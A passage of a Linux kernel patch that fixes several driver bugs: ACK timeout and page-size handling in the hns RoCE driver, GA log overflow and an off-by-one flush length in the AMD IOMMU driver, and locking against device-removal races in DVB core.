+-	/* MTU * (2 ^ LP_PKTN_INI) shouldn't be bigger than 16KB */
+-	lp_pktn_ini = ilog2(MAX_LP_MSG_LEN / mtu);
+-	if (WARN_ON(lp_pktn_ini >= 0xF))
+-		return -EINVAL;
++#define MIN_LP_MSG_LEN 1024
++	/* mtu * (2 ^ lp_pktn_ini) should be in the range of 1024 to mtu */
++	lp_pktn_ini = ilog2(max(mtu, MIN_LP_MSG_LEN) / mtu);
+ 
+ 	if (attr_mask & IB_QP_PATH_MTU) {
+ 		hr_reg_write(context, QPC_MTU, ib_mtu);
+@@ -5136,7 +5134,6 @@ static int hns_roce_v2_set_abs_fields(struct ib_qp *ibqp,
+ static bool check_qp_timeout_cfg_range(struct hns_roce_dev *hr_dev, u8 *timeout)
+ {
+ #define QP_ACK_TIMEOUT_MAX_HIP08 20
+-#define QP_ACK_TIMEOUT_OFFSET 10
+ #define QP_ACK_TIMEOUT_MAX 31
+ 
+ 	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08) {
+@@ -5145,7 +5142,7 @@ static bool check_qp_timeout_cfg_range(struct hns_roce_dev *hr_dev, u8 *timeout)
+ 				   "local ACK timeout shall be 0 to 20.\n");
+ 			return false;
+ 		}
+-		*timeout += QP_ACK_TIMEOUT_OFFSET;
++		*timeout += HNS_ROCE_V2_QP_ACK_TIMEOUT_OFS_HIP08;
+ 	} else if (hr_dev->pci_dev->revision > PCI_REVISION_ID_HIP08) {
+ 		if (*timeout > QP_ACK_TIMEOUT_MAX) {
+ 			ibdev_warn(&hr_dev->ib_dev,
+@@ -5431,6 +5428,18 @@ out:
+ 	return ret;
+ }
+ 
++static u8 get_qp_timeout_attr(struct hns_roce_dev *hr_dev,
++			      struct hns_roce_v2_qp_context *context)
++{
++	u8 timeout;
++
++	timeout = (u8)hr_reg_read(context, QPC_AT);
++	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08)
++		timeout -= HNS_ROCE_V2_QP_ACK_TIMEOUT_OFS_HIP08;
++
++	return timeout;
++}
++
+ static int hns_roce_v2_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *qp_attr,
+ 				int qp_attr_mask,
+ 				struct ib_qp_init_attr *qp_init_attr)
+@@ -5508,7 +5517,7 @@ static int hns_roce_v2_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *qp_attr,
+ 	qp_attr->max_dest_rd_atomic = 1 << hr_reg_read(&context, QPC_RR_MAX);
+ 
+ 	qp_attr->min_rnr_timer = (u8)hr_reg_read(&context, QPC_MIN_RNR_TIME);
+-	qp_attr->timeout = (u8)hr_reg_read(&context, QPC_AT);
++	qp_attr->timeout = get_qp_timeout_attr(hr_dev, &context);
+ 	qp_attr->retry_cnt = hr_reg_read(&context, QPC_RETRY_NUM_INIT);
+ 	qp_attr->rnr_retry = hr_reg_read(&context, QPC_RNR_NUM_INIT);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+index b1b3e1e0b84e5..2b4dbbb06eb56 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+@@ -72,6 +72,8 @@
+ #define HNS_ROCE_V2_IDX_ENTRY_SZ		4
+ 
+ #define HNS_ROCE_V2_SCCC_SZ			32
++#define HNS_ROCE_V2_QP_ACK_TIMEOUT_OFS_HIP08    10
++
+ #define HNS_ROCE_V3_SCCC_SZ			64
+ #define HNS_ROCE_V3_GMV_ENTRY_SZ		32
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 37a5cf62f88b4..14376490ac226 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -33,6 +33,7 @@
+ 
+ #include <linux/vmalloc.h>
+ #include <rdma/ib_umem.h>
++#include <linux/math.h>
+ #include "hns_roce_device.h"
+ #include "hns_roce_cmd.h"
+ #include "hns_roce_hem.h"
+@@ -909,6 +910,44 @@ static int mtr_init_buf_cfg(struct hns_roce_dev *hr_dev,
+ 	return page_cnt;
+ }
+ 
++static u64 cal_pages_per_l1ba(unsigned int ba_per_bt, unsigned int hopnum)
++{
++	return int_pow(ba_per_bt, hopnum - 1);
++}
++
++static unsigned int cal_best_bt_pg_sz(struct hns_roce_dev *hr_dev,
++				      struct hns_roce_mtr *mtr,
++				      unsigned int pg_shift)
++{
++	unsigned long cap = hr_dev->caps.page_size_cap;
++	struct hns_roce_buf_region *re;
++	unsigned int pgs_per_l1ba;
++	unsigned int ba_per_bt;
++	unsigned int ba_num;
++	int i;
++
++	for_each_set_bit_from(pg_shift, &cap, sizeof(cap) * BITS_PER_BYTE) {
++		if (!(BIT(pg_shift) & cap))
++			continue;
++
++		ba_per_bt = BIT(pg_shift) / BA_BYTE_LEN;
++		ba_num = 0;
++		for (i = 0; i < mtr->hem_cfg.region_count; i++) {
++			re = &mtr->hem_cfg.region[i];
++			if (re->hopnum == 0)
++				continue;
++
++			pgs_per_l1ba = cal_pages_per_l1ba(ba_per_bt, re->hopnum);
++			ba_num += DIV_ROUND_UP(re->count, pgs_per_l1ba);
++		}
++
++		if (ba_num <= ba_per_bt)
++			return pg_shift;
++	}
++
++	return 0;
++}
++
+ static int mtr_alloc_mtt(struct hns_roce_dev *hr_dev, struct hns_roce_mtr *mtr,
+ 			 unsigned int ba_page_shift)
+ {
+@@ -917,6 +956,10 @@ static int mtr_alloc_mtt(struct hns_roce_dev *hr_dev, struct hns_roce_mtr *mtr,
+ 
+ 	hns_roce_hem_list_init(&mtr->hem_list);
+ 	if (!cfg->is_direct) {
++		ba_page_shift = cal_best_bt_pg_sz(hr_dev, mtr, ba_page_shift);
++		if (!ba_page_shift)
++			return -ERANGE;
++
+ 		ret = hns_roce_hem_list_request(hr_dev, &mtr->hem_list,
+ 						cfg->region, cfg->region_count,
+ 						ba_page_shift);
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index f6973ea55eda7..6a8bb6ed4bf43 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -522,11 +522,6 @@ static int irdma_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ 	if (!iwqp->user_mode)
+ 		cancel_delayed_work_sync(&iwqp->dwork_flush);
+ 
+-	irdma_qp_rem_ref(&iwqp->ibqp);
+-	wait_for_completion(&iwqp->free_qp);
+-	irdma_free_lsmm_rsrc(iwqp);
+-	irdma_cqp_qp_destroy_cmd(&iwdev->rf->sc_dev, &iwqp->sc_qp);
+-
+ 	if (!iwqp->user_mode) {
+ 		if (iwqp->iwscq) {
+ 			irdma_clean_cqes(iwqp, iwqp->iwscq);
+@@ -534,6 +529,12 @@ static int irdma_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ 				irdma_clean_cqes(iwqp, iwqp->iwrcq);
+ 		}
+ 	}
++
++	irdma_qp_rem_ref(&iwqp->ibqp);
++	wait_for_completion(&iwqp->free_qp);
++	irdma_free_lsmm_rsrc(iwqp);
++	irdma_cqp_qp_destroy_cmd(&iwdev->rf->sc_dev, &iwqp->sc_qp);
++
+ 	irdma_remove_push_mmap_entries(iwqp);
+ 	irdma_free_qp_rsrc(iwqp);
+ 
+@@ -3190,6 +3191,7 @@ static int irdma_post_send(struct ib_qp *ibqp,
+ 			break;
+ 		case IB_WR_LOCAL_INV:
+ 			info.op_type = IRDMA_OP_TYPE_INV_STAG;
++			info.local_fence = info.read_fence;
+ 			info.op.inv_local_stag.target_stag = ib_wr->ex.invalidate_rkey;
+ 			err = irdma_uk_stag_local_invalidate(ukqp, &info, true);
+ 			break;
+diff --git a/drivers/iommu/amd/amd_iommu.h b/drivers/iommu/amd/amd_iommu.h
+index c160a332ce339..471f40351f4c8 100644
+--- a/drivers/iommu/amd/amd_iommu.h
++++ b/drivers/iommu/amd/amd_iommu.h
+@@ -15,9 +15,7 @@ extern irqreturn_t amd_iommu_int_thread(int irq, void *data);
+ extern irqreturn_t amd_iommu_int_handler(int irq, void *data);
+ extern void amd_iommu_apply_erratum_63(struct amd_iommu *iommu, u16 devid);
+ extern void amd_iommu_restart_event_logging(struct amd_iommu *iommu);
+-extern int amd_iommu_init_devices(void);
+-extern void amd_iommu_uninit_devices(void);
+-extern void amd_iommu_init_notifier(void);
++extern void amd_iommu_restart_ga_log(struct amd_iommu *iommu);
+ extern void amd_iommu_set_rlookup_table(struct amd_iommu *iommu, u16 devid);
+ 
+ #ifdef CONFIG_AMD_IOMMU_DEBUGFS
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 7c14b1d32c8db..b0af8b5967e0d 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -751,6 +751,30 @@ void amd_iommu_restart_event_logging(struct amd_iommu *iommu)
+ 	iommu_feature_enable(iommu, CONTROL_EVT_LOG_EN);
+ }
+ 
++/*
++ * This function restarts the GA log in case the IOMMU experienced
++ * a GA log overflow.
++ */
++void amd_iommu_restart_ga_log(struct amd_iommu *iommu)
++{
++	u32 status;
++
++	status = readl(iommu->mmio_base + MMIO_STATUS_OFFSET);
++	if (status & MMIO_STATUS_GALOG_RUN_MASK)
++		return;
++
++	pr_info_ratelimited("IOMMU GA Log restarting\n");
++
++	iommu_feature_disable(iommu, CONTROL_GALOG_EN);
++	iommu_feature_disable(iommu, CONTROL_GAINT_EN);
++
++	writel(MMIO_STATUS_GALOG_OVERFLOW_MASK,
++	       iommu->mmio_base + MMIO_STATUS_OFFSET);
++
++	iommu_feature_enable(iommu, CONTROL_GAINT_EN);
++	iommu_feature_enable(iommu, CONTROL_GALOG_EN);
++}
++
+ /*
+  * This function resets the command buffer if the IOMMU stopped fetching
+  * commands from it.
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index 26fb78003889f..5d34416b3468d 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -836,6 +836,7 @@ amd_iommu_set_pci_msi_domain(struct device *dev, struct amd_iommu *iommu) { }
+ 	(MMIO_STATUS_EVT_OVERFLOW_INT_MASK | \
+ 	 MMIO_STATUS_EVT_INT_MASK | \
+ 	 MMIO_STATUS_PPR_INT_MASK | \
++	 MMIO_STATUS_GALOG_OVERFLOW_MASK | \
+ 	 MMIO_STATUS_GALOG_INT_MASK)
+ 
+ irqreturn_t amd_iommu_int_thread(int irq, void *data)
+@@ -859,10 +860,16 @@ irqreturn_t amd_iommu_int_thread(int irq, void *data)
+ 		}
+ 
+ #ifdef CONFIG_IRQ_REMAP
+-		if (status & MMIO_STATUS_GALOG_INT_MASK) {
++		if (status & (MMIO_STATUS_GALOG_INT_MASK |
++			      MMIO_STATUS_GALOG_OVERFLOW_MASK)) {
+ 			pr_devel("Processing IOMMU GA Log\n");
+ 			iommu_poll_ga_log(iommu);
+ 		}
++
++		if (status & MMIO_STATUS_GALOG_OVERFLOW_MASK) {
++			pr_info_ratelimited("IOMMU GA Log overflow\n");
++			amd_iommu_restart_ga_log(iommu);
++		}
+ #endif
+ 
+ 		if (status & MMIO_STATUS_EVT_OVERFLOW_INT_MASK) {
+@@ -2094,6 +2101,15 @@ out_err:
+ 	return NULL;
+ }
+ 
++static inline u64 dma_max_address(void)
++{
++	if (amd_iommu_pgtable == AMD_IOMMU_V1)
++		return ~0ULL;
++
++	/* V2 with 4 level page table */
++	return ((1ULL << PM_LEVEL_SHIFT(PAGE_MODE_4_LEVEL)) - 1);
++}
++
+ static struct iommu_domain *amd_iommu_domain_alloc(unsigned type)
+ {
+ 	struct protection_domain *domain;
+@@ -2110,7 +2126,7 @@ static struct iommu_domain *amd_iommu_domain_alloc(unsigned type)
+ 		return NULL;
+ 
+ 	domain->domain.geometry.aperture_start = 0;
+-	domain->domain.geometry.aperture_end   = ~0ULL;
++	domain->domain.geometry.aperture_end   = dma_max_address();
+ 	domain->domain.geometry.force_aperture = true;
+ 
+ 	return &domain->domain;
+@@ -2389,7 +2405,7 @@ static void amd_iommu_iotlb_sync(struct iommu_domain *domain,
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&dom->lock, flags);
+-	domain_flush_pages(dom, gather->start, gather->end - gather->start, 1);
++	domain_flush_pages(dom, gather->start, gather->end - gather->start + 1, 1);
+ 	amd_iommu_domain_flush_complete(dom);
+ 	spin_unlock_irqrestore(&dom->lock, flags);
+ }
+@@ -3504,8 +3520,7 @@ int amd_iommu_activate_guest_mode(void *data)
+ 	struct irte_ga *entry = (struct irte_ga *) ir_data->entry;
+ 	u64 valid;
+ 
+-	if (!AMD_IOMMU_GUEST_IR_VAPIC(amd_iommu_guest_ir) ||
+-	    !entry || entry->lo.fields_vapic.guest_mode)
++	if (!AMD_IOMMU_GUEST_IR_VAPIC(amd_iommu_guest_ir) || !entry)
+ 		return 0;
+ 
+ 	valid = entry->lo.fields_vapic.valid;
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index e93ca9dc37c8e..2ae5a6058a34a 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -737,7 +737,8 @@ static void mtk_iommu_flush_iotlb_all(struct iommu_domain *domain)
+ {
+ 	struct mtk_iommu_domain *dom = to_mtk_domain(domain);
+ 
+-	mtk_iommu_tlb_flush_all(dom->bank->parent_data);
++	if (dom->bank)
++		mtk_iommu_tlb_flush_all(dom->bank->parent_data);
+ }
+ 
+ static void mtk_iommu_iotlb_sync(struct iommu_domain *domain,
+diff --git a/drivers/iommu/rockchip-iommu.c b/drivers/iommu/rockchip-iommu.c
+index a68eadd64f38d..f7e9b56be174f 100644
+--- a/drivers/iommu/rockchip-iommu.c
++++ b/drivers/iommu/rockchip-iommu.c
+@@ -1303,20 +1303,22 @@ static int rk_iommu_probe(struct platform_device *pdev)
+ 	for (i = 0; i < iommu->num_irq; i++) {
+ 		int irq = platform_get_irq(pdev, i);
+ 
+-		if (irq < 0)
+-			return irq;
++		if (irq < 0) {
++			err = irq;
++			goto err_pm_disable;
++		}
+ 
+ 		err = devm_request_irq(iommu->dev, irq, rk_iommu_irq,
+ 				       IRQF_SHARED, dev_name(dev), iommu);
+-		if (err) {
+-			pm_runtime_disable(dev);
+-			goto err_remove_sysfs;
+-		}
++		if (err)
++			goto err_pm_disable;
+ 	}
+ 
+ 	dma_set_mask_and_coherent(dev, rk_ops->dma_bit_mask);
+ 
+ 	return 0;
++err_pm_disable:
++	pm_runtime_disable(dev);
+ err_remove_sysfs:
+ 	iommu_device_sysfs_remove(&iommu->iommu);
+ err_put_group:
+diff --git a/drivers/mailbox/mailbox-test.c b/drivers/mailbox/mailbox-test.c
+index 4555d678fadda..abcee58e851c2 100644
+--- a/drivers/mailbox/mailbox-test.c
++++ b/drivers/mailbox/mailbox-test.c
+@@ -12,6 +12,7 @@
+ #include <linux/kernel.h>
+ #include <linux/mailbox_client.h>
+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ #include <linux/poll.h>
+@@ -38,6 +39,7 @@ struct mbox_test_device {
+ 	char			*signal;
+ 	char			*message;
+ 	spinlock_t		lock;
++	struct mutex		mutex;
+ 	wait_queue_head_t	waitq;
+ 	struct fasync_struct	*async_queue;
+ 	struct dentry		*root_debugfs_dir;
+@@ -95,6 +97,7 @@ static ssize_t mbox_test_message_write(struct file *filp,
+ 				       size_t count, loff_t *ppos)
+ {
+ 	struct mbox_test_device *tdev = filp->private_data;
++	char *message;
+ 	void *data;
+ 	int ret;
+ 
+@@ -110,10 +113,13 @@ static ssize_t mbox_test_message_write(struct file *filp,
+ 		return -EINVAL;
+ 	}
+ 
+-	tdev->message = kzalloc(MBOX_MAX_MSG_LEN, GFP_KERNEL);
+-	if (!tdev->message)
++	message = kzalloc(MBOX_MAX_MSG_LEN, GFP_KERNEL);
++	if (!message)
+ 		return -ENOMEM;
+ 
++	mutex_lock(&tdev->mutex);
++
++	tdev->message = message;
+ 	ret = copy_from_user(tdev->message, userbuf, count);
+ 	if (ret) {
+ 		ret = -EFAULT;
+@@ -144,6 +150,8 @@ out:
+ 	kfree(tdev->message);
+ 	tdev->signal = NULL;
+ 
++	mutex_unlock(&tdev->mutex);
++
+ 	return ret < 0 ? ret : count;
+ }
+ 
+@@ -392,6 +400,7 @@ static int mbox_test_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, tdev);
+ 
+ 	spin_lock_init(&tdev->lock);
++	mutex_init(&tdev->mutex);
+ 
+ 	if (tdev->rx_channel) {
+ 		tdev->rx_buffer = devm_kzalloc(&pdev->dev,
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index f787c9e5b10e7..fbef3c9badb65 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -5516,7 +5516,7 @@ static int raid5_read_one_chunk(struct mddev *mddev, struct bio *raid_bio)
+ 
+ 	sector = raid5_compute_sector(conf, raid_bio->bi_iter.bi_sector, 0,
+ 				      &dd_idx, NULL);
+-	end_sector = bio_end_sector(raid_bio);
++	end_sector = sector + bio_sectors(raid_bio);
+ 
+ 	rcu_read_lock();
+ 	if (r5c_big_stripe_cached(conf, sector))
+diff --git a/drivers/media/dvb-core/dvb_ca_en50221.c b/drivers/media/dvb-core/dvb_ca_en50221.c
+index c2d2792227f86..baf64540dc00a 100644
+--- a/drivers/media/dvb-core/dvb_ca_en50221.c
++++ b/drivers/media/dvb-core/dvb_ca_en50221.c
+@@ -151,6 +151,12 @@ struct dvb_ca_private {
+ 
+ 	/* mutex serializing ioctls */
+ 	struct mutex ioctl_mutex;
++
++	/* A mutex used when a device is disconnected */
++	struct mutex remove_mutex;
++
++	/* Whether the device is disconnected */
++	int exit;
+ };
+ 
+ static void dvb_ca_private_free(struct dvb_ca_private *ca)
+@@ -187,7 +193,7 @@ static void dvb_ca_en50221_thread_wakeup(struct dvb_ca_private *ca);
+ static int dvb_ca_en50221_read_data(struct dvb_ca_private *ca, int slot,
+ 				    u8 *ebuf, int ecount);
+ static int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot,
+-				     u8 *ebuf, int ecount);
++				     u8 *ebuf, int ecount, int size_write_flag);
+ 
+ /**
+  * findstr - Safely find needle in haystack.
+@@ -370,7 +376,7 @@ static int dvb_ca_en50221_link_init(struct dvb_ca_private *ca, int slot)
+ 	ret = dvb_ca_en50221_wait_if_status(ca, slot, STATUSREG_FR, HZ / 10);
+ 	if (ret)
+ 		return ret;
+-	ret = dvb_ca_en50221_write_data(ca, slot, buf, 2);
++	ret = dvb_ca_en50221_write_data(ca, slot, buf, 2, CMDREG_SW);
+ 	if (ret != 2)
+ 		return -EIO;
+ 	ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN);
+@@ -778,11 +784,13 @@ exit:
+  * @buf: The data in this buffer is treated as a complete link-level packet to
+  *	 be written.
+  * @bytes_write: Size of ebuf.
++ * @size_write_flag: A flag on the Command Register which says whether the link size
++ * information will be written or not.
+  *
+  * return: Number of bytes written, or < 0 on error.
+  */
+ static int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot,
+-				     u8 *buf, int bytes_write)
++				     u8 *buf, int bytes_write, int size_write_flag)
+ {
+ 	struct dvb_ca_slot *sl = &ca->slot_info[slot];
+ 	int status;
+@@ -817,7 +825,7 @@ static int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot,
+ 
+ 	/* OK, set HC bit */
+ 	status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND,
+-					    IRQEN | CMDREG_HC);
++					    IRQEN | CMDREG_HC | size_write_flag);
+ 	if (status)
+ 		goto exit;
+ 
+@@ -1508,7 +1516,7 @@ static ssize_t dvb_ca_en50221_io_write(struct file *file,
+ 
+ 			mutex_lock(&sl->slot_lock);
+ 			status = dvb_ca_en50221_write_data(ca, slot, fragbuf,
+-							   fraglen + 2);
++							   fraglen + 2, 0);
+ 			mutex_unlock(&sl->slot_lock);
+ 			if (status == (fraglen + 2)) {
+ 				written = 1;
+@@ -1709,12 +1717,22 @@ static int dvb_ca_en50221_io_open(struct inode *inode, struct file *file)
+ 
+ 	dprintk("%s\n", __func__);
+ 
+-	if (!try_module_get(ca->pub->owner))
++	mutex_lock(&ca->remove_mutex);
++
++	if (ca->exit) {
++		mutex_unlock(&ca->remove_mutex);
++		return -ENODEV;
++	}
++
++	if (!try_module_get(ca->pub->owner)) {
++		mutex_unlock(&ca->remove_mutex);
+ 		return -EIO;
++	}
+ 
+ 	err = dvb_generic_open(inode, file);
+ 	if (err < 0) {
+ 		module_put(ca->pub->owner);
++		mutex_unlock(&ca->remove_mutex);
+ 		return err;
+ 	}
+ 
+@@ -1739,6 +1757,7 @@ static int dvb_ca_en50221_io_open(struct inode *inode, struct file *file)
+ 
+ 	dvb_ca_private_get(ca);
+ 
++	mutex_unlock(&ca->remove_mutex);
+ 	return 0;
+ }
+ 
+@@ -1758,6 +1777,8 @@ static int dvb_ca_en50221_io_release(struct inode *inode, struct file *file)
+ 
+ 	dprintk("%s\n", __func__);
+ 
++	mutex_lock(&ca->remove_mutex);
++
+ 	/* mark the CA device as closed */
+ 	ca->open = 0;
+ 	dvb_ca_en50221_thread_update_delay(ca);
+@@ -1768,6 +1789,13 @@ static int dvb_ca_en50221_io_release(struct inode *inode, struct file *file)
+ 
+ 	dvb_ca_private_put(ca);
+ 
++	if (dvbdev->users == 1 && ca->exit == 1) {
++		mutex_unlock(&ca->remove_mutex);
++		wake_up(&dvbdev->wait_queue);
++	} else {
++		mutex_unlock(&ca->remove_mutex);
++	}
++
+ 	return err;
+ }
+ 
+@@ -1891,6 +1919,7 @@ int dvb_ca_en50221_init(struct dvb_adapter *dvb_adapter,
+ 	}
+ 
+ 	mutex_init(&ca->ioctl_mutex);
++	mutex_init(&ca->remove_mutex);
+ 
+ 	if (signal_pending(current)) {
+ 		ret = -EINTR;
+@@ -1933,6 +1962,14 @@ void dvb_ca_en50221_release(struct dvb_ca_en50221 *pubca)
+ 
+ 	dprintk("%s\n", __func__);
+ 
++	mutex_lock(&ca->remove_mutex);
++	ca->exit = 1;
++	mutex_unlock(&ca->remove_mutex);
++
++	if (ca->dvbdev->users < 1)
++		wait_event(ca->dvbdev->wait_queue,
++				ca->dvbdev->users == 1);
++
+ 	/* shutdown the thread if there was one */
+ 	kthread_stop(ca->thread);
+ 
+diff --git a/drivers/media/dvb-core/dvb_demux.c b/drivers/media/dvb-core/dvb_demux.c
+index 83cc32ad7e122..eadd579bb4fad 100644
+--- a/drivers/media/dvb-core/dvb_demux.c
++++ b/drivers/media/dvb-core/dvb_demux.c
+@@ -115,12 +115,12 @@ static inline int dvb_dmx_swfilter_payload(struct dvb_demux_feed *feed,
+ 
+ 	cc = buf[3] & 0x0f;
+ 	ccok = ((feed->cc + 1) & 0x0f) == cc;
+-	feed->cc = cc;
+ 	if (!ccok) {
+ 		set_buf_flags(feed, DMX_BUFFER_FLAG_DISCONTINUITY_DETECTED);
+ 		dprintk_sect_loss("missed packet: %d instead of %d!\n",
+ 				  cc, (feed->cc + 1) & 0x0f);
+ 	}
++	feed->cc = cc;
+ 
+ 	if (buf[1] & 0x40)	// PUSI ?
+ 		feed->peslen = 0xfffa;
+@@ -300,7 +300,6 @@ static int dvb_dmx_swfilter_section_packet(struct dvb_demux_feed *feed,
+ 
+ 	cc = buf[3] & 0x0f;
+ 	ccok = ((feed->cc + 1) & 0x0f) == cc;
+-	feed->cc = cc;
+ 
+ 	if (buf[3] & 0x20) {
+ 		/* adaption field present, check for discontinuity_indicator */
+@@ -336,6 +335,7 @@ static int dvb_dmx_swfilter_section_packet(struct dvb_demux_feed *feed,
+ 		feed->pusi_seen = false;
+ 		dvb_dmx_swfilter_section_new(feed);
+ 	}
++	feed->cc = cc;
+ 
+ 	if (buf[1] & 0x40) {
+ 		/* PUSI=1 (is set), section boundary is here */
+diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c
+index c41a7e5c2b928..fce0e20940780 100644
+--- a/drivers/media/dvb-core/dvb_frontend.c
++++ b/drivers/media/dvb-core/dvb_frontend.c
+@@ -293,14 +293,22 @@ static int dvb_frontend_get_event(struct dvb_frontend *fe,
+ 	}
+ 
+ 	if (events->eventw == events->eventr) {
+-		int ret;
++		struct wait_queue_entry wait;
++		int ret = 0;
+ 
+ 		if (flags & O_NONBLOCK)
+ 			return -EWOULDBLOCK;
+ 
+-		ret = wait_event_interruptible(events->wait_queue,
+-					       dvb_frontend_test_event(fepriv, events));
+-
++		init_waitqueue_entry(&wait, current);
++		add_wait_queue(&events->wait_queue, &wait);
++		while (!dvb_frontend_test_event(fepriv, events)) {
++			wait_woken(&wait, TASK_INTERRUPTIBLE, 0);
++			if (signal_pending(current)) {
++				ret = -ERESTARTSYS;
++				break;
++			}
++		}
++		remove_wait_queue(&events->wait_queue, &wait);
+ 		if (ret < 0)
+ 			return ret;
+ 	}
+diff --git a/drivers/media/dvb-core/dvb_net.c b/drivers/media/dvb-core/dvb_net.c
+index 8a2febf33ce28..8bb8dd34c223e 100644
+--- a/drivers/media/dvb-core/dvb_net.c
++++ b/drivers/media/dvb-core/dvb_net.c
+@@ -1564,15 +1564,43 @@ static long dvb_net_ioctl(struct file *file,
+ 	return dvb_usercopy(file, cmd, arg, dvb_net_do_ioctl);
+ }
+ 
++static int locked_dvb_net_open(struct inode *inode, struct file *file)
++{
++	struct dvb_device *dvbdev = file->private_data;
++	struct dvb_net *dvbnet = dvbdev->priv;
++	int ret;
++
++	if (mutex_lock_interruptible(&dvbnet->remove_mutex))
++		return -ERESTARTSYS;
++
++	if (dvbnet->exit) {
++		mutex_unlock(&dvbnet->remove_mutex);
++		return -ENODEV;
++	}
++
++	ret = dvb_generic_open(inode, file);
++
++	mutex_unlock(&dvbnet->remove_mutex);
++
++	return ret;
++}
++
+ static int dvb_net_close(struct inode *inode, struct file *file)
+ {
+ 	struct dvb_device *dvbdev = file->private_data;
+ 	struct dvb_net *dvbnet = dvbdev->priv;
+ 
++	mutex_lock(&dvbnet->remove_mutex);
++
+ 	dvb_generic_release(inode, file);
+ 
+-	if(dvbdev->users == 1 && dvbnet->exit == 1)
++	if (dvbdev->users == 1 && dvbnet->exit == 1) {
++		mutex_unlock(&dvbnet->remove_mutex);
+ 		wake_up(&dvbdev->wait_queue);
++	} else {
++		mutex_unlock(&dvbnet->remove_mutex);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -1580,7 +1608,7 @@ static int dvb_net_close(struct inode *inode, struct file *file)
+ static const struct file_operations dvb_net_fops = {
+ 	.owner = THIS_MODULE,
+ 	.unlocked_ioctl = dvb_net_ioctl,
+-	.open =	dvb_generic_open,
++	.open =	locked_dvb_net_open,
+ 	.release = dvb_net_close,
+ 	.llseek = noop_llseek,
+ };
+@@ -1599,10 +1627,13 @@ void dvb_net_release (struct dvb_net *dvbnet)
+ {
+ 	int i;
+ 
++	mutex_lock(&dvbnet->remove_mutex);
+ 	dvbnet->exit = 1;
++	mutex_unlock(&dvbnet->remove_mutex);
++
+ 	if (dvbnet->dvbdev->users < 1)
+ 		wait_event(dvbnet->dvbdev->wait_queue,
+-				dvbnet->dvbdev->users==1);
++				dvbnet->dvbdev->users == 1);
+ 
+ 	dvb_unregister_device(dvbnet->dvbdev);
+ 
+@@ -1621,6 +1652,7 @@ int dvb_net_init (struct dvb_adapter *adap, struct dvb_net *dvbnet,
+ 	int i;
+ 
+ 	mutex_init(&dvbnet->ioctl_mutex);
++	mutex_init(&dvbnet->remove_mutex);
+ 	dvbnet->demux = dmx;
+ 
+ 	for (i=0; i<DVB_NET_DEVICES_MAX; i++)
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index a31d52cb6d62c..9f9a976527080 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -27,6 +27,7 @@
+ #include <media/tuner.h>
+ 
+ static DEFINE_MUTEX(dvbdev_mutex);
++static LIST_HEAD(dvbdevfops_list);
+ static int dvbdev_debug;
+ 
+ module_param(dvbdev_debug, int, 0644);
+@@ -452,14 +453,15 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 			enum dvb_device_type type, int demux_sink_pads)
+ {
+ 	struct dvb_device *dvbdev;
+-	struct file_operations *dvbdevfops;
++	struct file_operations *dvbdevfops = NULL;
++	struct dvbdevfops_node *node = NULL, *new_node = NULL;
+ 	struct device *clsdev;
+ 	int minor;
+ 	int id, ret;
+ 
+ 	mutex_lock(&dvbdev_register_lock);
+ 
+-	if ((id = dvbdev_get_free_id (adap, type)) < 0){
++	if ((id = dvbdev_get_free_id (adap, type)) < 0) {
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		*pdvbdev = NULL;
+ 		pr_err("%s: couldn't find free device id\n", __func__);
+@@ -467,18 +469,45 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 	}
+ 
+ 	*pdvbdev = dvbdev = kzalloc(sizeof(*dvbdev), GFP_KERNEL);
+-
+ 	if (!dvbdev){
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return -ENOMEM;
+ 	}
+ 
+-	dvbdevfops = kmemdup(template->fops, sizeof(*dvbdevfops), GFP_KERNEL);
++	/*
++	 * When a device of the same type is probe()d more than once,
